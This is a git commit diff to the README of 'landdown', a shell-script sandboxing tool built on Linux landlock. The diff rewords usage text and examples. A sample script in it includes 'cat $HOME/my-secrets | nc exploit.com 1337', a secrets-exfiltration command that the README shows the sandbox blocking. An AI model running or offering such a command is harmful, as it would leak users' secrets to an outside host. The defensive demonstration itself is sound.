landdown
Simple Sandboxing for shell scripts.
git clone git://mccd.space/landdown
| Log | Files | Refs | README | LICENSE |
commit 02dfbe6622c0a5f189390fcdd96e9e34048ba6e6 parent 37a2ebb69d67f34176e0c5b5ff4c1e7a5d876e8a Author: Marc <marc@coquand.email> Date: Thu, 2 Apr 2026 21:21:59 +0200 README Diffstat:
| M | README.md | | | 16 | +++++++++------- |
1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/README.md b/README.md @@ -1,6 +1,6 @@ # Landdown - Simple shell script sandbox -An ergonomic Linux utility for sandboxing shell scripts using [landlock](https://landlock.io). In particular, it aims to protect you against the security impacts of bugs or unexpected/malicious behavior. To use, prepend your script with landdown and allow list. For example: +Landdown is a easy-to-use utility for Linux that allows you to sandbox shell scripts using [landlock](https://landlock.io). Just like Landlock, Landdown "aims to protect you against the security impacts of bugs or unexpected/malicious behavior". To use, prepend your script with a landdown shebang and a ruleset. For example: ```sh #!/usr/bin/env landdown @@ -9,19 +9,19 @@ ro /lib #!/bin/sh # Following works echo "Hi" -# The following fails +# Following fails cat $HOME/my-secrets | nc exploit.com 1337 ``` -landdown locks down file and network access of a script to those explicitly listed in the allowlist. +Landdown locks down file and network access of a script based on rules explicitly listed in the allowlist. The syntax is: ``` #!/usr/bin/env landdown -rules... -#!/interpreter -script content... +<rules...> +#!<interpreter> +<script content...> ``` ## Supported rules @@ -46,7 +46,7 @@ go install git.sr.ht/~marcc/landdown@latest ## Examples -### Edit a file +### Access a file ```sh #!/usr/bin/env landdown @@ -76,4 +76,6 @@ curl https://www.google.com Try removing `ro /etc/ssl`, `rof /etc/resolv.conf`, or `connect 443` and it should fail. Network access needs to be explicitly set. +## See also +- **sh**(1) - section on ulimit